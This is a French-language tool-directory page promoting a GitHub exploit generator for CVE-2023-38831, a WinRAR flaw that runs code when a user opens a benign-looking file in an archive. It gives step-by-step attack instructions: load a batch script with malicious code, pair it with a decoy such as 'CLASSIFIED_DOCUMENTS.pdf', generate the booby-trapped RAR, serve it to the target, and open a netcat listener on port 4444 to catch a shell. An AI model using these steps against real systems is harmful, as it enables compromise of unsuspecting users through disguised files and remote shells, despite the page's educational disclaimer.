Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-38831 | Kitploit
Outils/GitHubGitHub/asepsaepdin/cve-2023-38831
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubasepsaepdin/cve-2023-38831

CVE-2023-38831

Voir le dépôt
il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-38831 - Vulnérabilité d'exécution de code dans RARLAB WinRAR

Python


⚠️ À des fins éducatives et de recherche en sécurité autorisées uniquement

Auteurs de l'exploit original

Très reconnaissant envers l'auteur original du PoC b1tg et Group-IB Threat Intelligence

Description

RARLabs WinRAR antérieur à 6.23 permet aux attaquants d'exécuter du code arbitraire lorsqu'un utilisateur tente d'afficher un fichier bénin dans une archive ZIP.

image

Le problème survient car une archive ZIP peut inclure un fichier bénin (tel qu'un fichier .JPG ordinaire) ainsi qu'un dossier portant le même nom que le fichier bénin, et le contenu du dossier (qui peut inclure du contenu exécutable) est traité lors d'une tentative d'accès au seul fichier bénin. Cette vulnérabilité a été exploitée dans la nature d'avril à août 2023.

Démo

winrar


Guide des étapes

  1. Tout d'abord, modifiez le fichier script.bat avec votre code d'exécution dangereux

  2. Insérez le fichier leurre ; il est recommandé qu'il s'agisse d'une image (.png, jpg) ou d'un document (.pdf)

  3. Exécutez la commande pour générer le fichier exploit

    root@kitploit:~
    python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat  poc.rar
    
  4. Envoyez le fichier exploit à la machine cible à l'aide de python http.server, par exemple :

    root@kitploit:~
    python -m http.server
    
  5. Configurez le listener sur votre machine d'attaque :

    root@kitploit:~
    nc -nlvp 4444
    
  6. Téléchargez et ouvrez le fichier exploit avec WinRAR version antérieure à 6.23


Crédits

  • https://github.com/b1tg/CVE-2023-38831-winrar-exploit
  • https://nvd.nist.gov/vuln/detail/CVE-2023-38831
  • https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
Télécharger l’outil